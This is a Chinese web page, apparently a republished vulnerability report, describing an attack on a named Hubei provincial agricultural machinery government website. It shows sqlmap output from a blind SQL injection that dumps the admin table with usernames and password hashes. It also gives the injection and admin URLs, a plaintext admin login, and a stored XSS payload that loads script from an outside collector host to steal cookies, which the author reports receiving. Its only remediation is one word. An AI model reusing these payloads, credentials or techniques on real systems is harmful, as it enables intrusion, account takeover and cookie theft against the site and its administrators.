网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

湖北省农机安全监理推广信息网存储型XSS+SQL注入(已打Cookies) - 网站安全 - 自学php网

来源:未知    时间:2015-04-15 13:39 作者:xxadmin 阅读:

[导读] 湖北省农机安全监理推广信息网存储型XSS+SQL注入(已打Cookies) sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: classId Type: boolean-based blind Title: AND boolean...

湖北省农机安全监理推广信息网存储型XSS+SQL注入(已打Cookies)

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: classId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classId=103 AND 6332=6332
---
[10:47:53] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:47:53] [ERROR] cannot retrieve column names, back-end DBMS is Access
[10:47:53] [INFO] fetching entries of column(s) 'classid, id, orderid, password,
 setting, username, usernmae' for table 'admin' in database 'Microsoft_Access_ma
sterdb'
[10:47:53] [INFO] fetching number of column(s) 'classid, id, orderid, password,
setting, username, usernmae' entries for table 'admin' in database 'Microsoft_Ac
cess_masterdb'
[10:47:53] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[10:47:53] [INFO] retrieved:
[10:47:54] [WARNING] reflective value(s) found and filtering out
3
[10:47:55] [INFO] heuristics detected web page charset 'GB2312'

[10:47:55] [INFO] fetching number of distinct values for column 'id'
[10:47:55] [INFO] retrieved: 3
[10:47:57] [INFO] using column 'id' as a pivot for retrieving row data
[10:47:57] [INFO] retrieved: 1
[10:48:01] [INFO] retrieved: 103
[10:48:12] [INFO] retrieved: 4
[10:48:16] [INFO] retrieved: 0
[10:48:19] [INFO] retrieved: e583273c626a4876
[10:49:01] [INFO] retrieved:
[10:49:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
hubeinongji
[10:49:52] [INFO] retrieved:
[10:49:53] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[10:49:53] [INFO] retrieved: 3
[10:49:57] [INFO] retrieved: 103
[10:50:05] [INFO] retrieved: 4
[10:50:09] [INFO] retrieved: 0
[10:50:12] [INFO] retrieved: 7a57a5a743894a0e
[10:51:03] [INFO] retrieved: fitdoing
[10:51:25] [INFO] retrieved:
[10:51:26] [INFO] retrieved: 4
[10:51:29] [INFO] retrieved: 103
[10:51:38] [INFO] retrieved: 4
[10:51:42] [INFO] retrieved: 0
[10:51:45] [INFO] retrieved: 39776a07e1c3a922
[10:52:30] [INFO] retrieved: hbnj
[10:52:42] [INFO] retrieved:
[10:52:43] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack t
hem via a dictionary-based attack? [y/N/q] N
Database: Microsoft_Access_masterdb
Table: admin
[3 entries]
+----+---------+---------+---------+----------+-------------+------------------+

| id | classid | orderid | setting | usernmae | username    | password         |

+----+---------+---------+---------+----------+-------------+------------------+

| 1  | 103     | 4       | 0       | <blank>  | hubeinongji | e583273c626a4876 |

| 3  | 103     | 4       | 0       | <blank>  | fitdoing    | 7a57a5a743894a0e |

| 4  | 103     | 4       | 0       | <blank>  | hbnj        | 39776a07e1c3a922 |

+----+---------+---------+---------+----------+-------------+------------------+


[10:53:31] [INFO] table 'Microsoft_Access_masterdb.admin' dumped to CSV file 'F:
\SqlMap\Bin\output\www.hbnjjl.gov.cn\dump\Microsoft_Access_masterdb\admin.csv'
[10:53:31] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 784 times
[10:53:31] [INFO] fetched data logged to text files under 'F:\SqlMap\Bin\output\
www.hbnjjl.gov.cn'





注入点:http://www.hbnjjl.gov.cn/listDirect.asp?classId=102



asp+access 没啥可说的。



主要还是那啥。有个站长信箱。

 

QQ截图20150301105659.png


 

QQ截图20150301105821.png



搜索过滤了<..这里居然啥都没过滤.邪恶了 - -

</div><script>alert("wooyun")</script>

 

</textarea>'"><script src=http://webxss.net/A6JnLp?1425178565></script>



在上面已经拿到了后台账号密码。。直接进去看看。。

后台:http://www.hbnjjl.gov.cn/adminManage/

username:fitdoing password:admin

 

QQ截图20150301110259.png



找到站长信箱!
 

QQ截图20150301110335.png



cookies也收到了。
 

QQ截图20150301110429.png

 

解决方案:

过滤

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论